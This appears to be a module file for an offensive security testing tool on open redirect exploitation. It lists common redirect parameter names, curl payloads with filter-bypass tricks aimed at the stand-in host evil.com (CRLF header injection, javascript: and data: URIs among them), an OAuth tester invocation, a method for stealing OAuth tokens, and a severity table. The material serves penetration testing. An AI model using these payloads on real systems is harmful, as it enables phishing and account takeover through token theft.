attack-open-redirect
Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains
| field | value |
|---|---|
| name | attack-open-redirect |
| description | Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["open-redirect","web","phishing","oauth","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-601"] |
| chains_with | ["attack-cors","attack-jwt"] |
| prerequisites | [] |
| severity_boost | {"attack-jwt":"Open redirect + OAuth = JWT/token theft"} |
Exploit URL redirect parameters to send users to attacker-controlled domains, steal OAuth codes or tokens, or bypass security controls that trust the redirect target (login return URLs, SSO callbacks, link-out handlers).

Common parameter names:

```
url, redirect, redirect_url, redirect_uri, return, return_url, returnTo,
next, goto, target, dest, destination, rurl, redir, forward, continue,
callback, path, out, view, login_url, image_url, go, link, ref
```
```bash
# A hit is a 3xx whose Location header points at evil.com (or a client-side
# redirect that lands there); read the raw headers instead of following them.
# Direct redirect
curl -s -D- "https://TARGET/redirect?url=https://evil.com"
# Protocol-relative (scheme-less //host)
curl -s -D- "https://TARGET/redirect?url=//evil.com"
# Encoded
curl -s -D- "https://TARGET/redirect?url=https%3A%2F%2Fevil.com"
# Backslash bypass: some server-side parsers read TARGET as the host, browsers treat "\" as "/"
curl -s -D- "https://TARGET/redirect?url=https://evil.com\@TARGET"
# At-sign bypass: TARGET becomes userinfo, evil.com is the real host
curl -s -D- "https://TARGET/redirect?url=https://TARGET@evil.com"
# Subdomain matching (defeats startswith / "contains TARGET" checks)
curl -s -D- "https://TARGET/redirect?url=https://TARGET.evil.com"
# Fragment trick: %23 is "#", so ".TARGET" is never sent to any server
curl -s -D- "https://TARGET/redirect?url=https://evil.com%23.TARGET"
# Percent-encoded hostname ("evil" as %65%76%69%6c)
curl -s -D- "https://TARGET/redirect?url=https://%65%76%69%6c.com"
# Double encoding (decoded twice: %252F -> %2F -> /)
curl -s -D- "https://TARGET/redirect?url=https%253A%252F%252Fevil.com"
# Null byte (C-style string handling truncates before ".TARGET")
curl -s -D- "https://TARGET/redirect?url=https://evil.com%00.TARGET"
# CRLF + Location header (a hit here is header injection / response splitting, not only a redirect)
curl -s -D- "https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com"
# JavaScript scheme: only meaningful for client-side redirects (location = param); browsers ignore it in a Location header
curl -s -D- "https://TARGET/redirect?url=javascript:alert(document.domain)"
# Data URI: same caveat, and modern browsers block top-level navigation to data: URLs
curl -s -D- "https://TARGET/redirect?url=data:text/html,<script>alert(1)</script>"
```
```bash
# Test with OAuth tester
attack_script oauth_tester "https://TARGET/oauth/authorize" \
  --client-id CLIENT_ID \
  --redirect-uri "https://TARGET/callback" \
  --json-output
```

If the authorization server's redirect_uri check is weak (host-only or prefix matching instead of an exact match against the registered value), redirect_uri can point at the attacker's domain directly, or at an open redirect on the allowed host, and the authorization code or access token is delivered to the attacker. With the implicit grant the token travels in the URL fragment, and the browser carries that fragment across the open redirect's 302 unchanged because the Location header has no fragment of its own.
| Finding | Severity |
|---|---|
| Open redirect + OAuth token theft | Critical (P1) |
| Open redirect in login/auth flow | High (P2) |
| Generic open redirect | Medium (P3) |
| JavaScript scheme redirect (XSS) | High (P2) |
attack_script oauth_tester — OAuth redirect_uri bypass testing
curl — manual redirect testing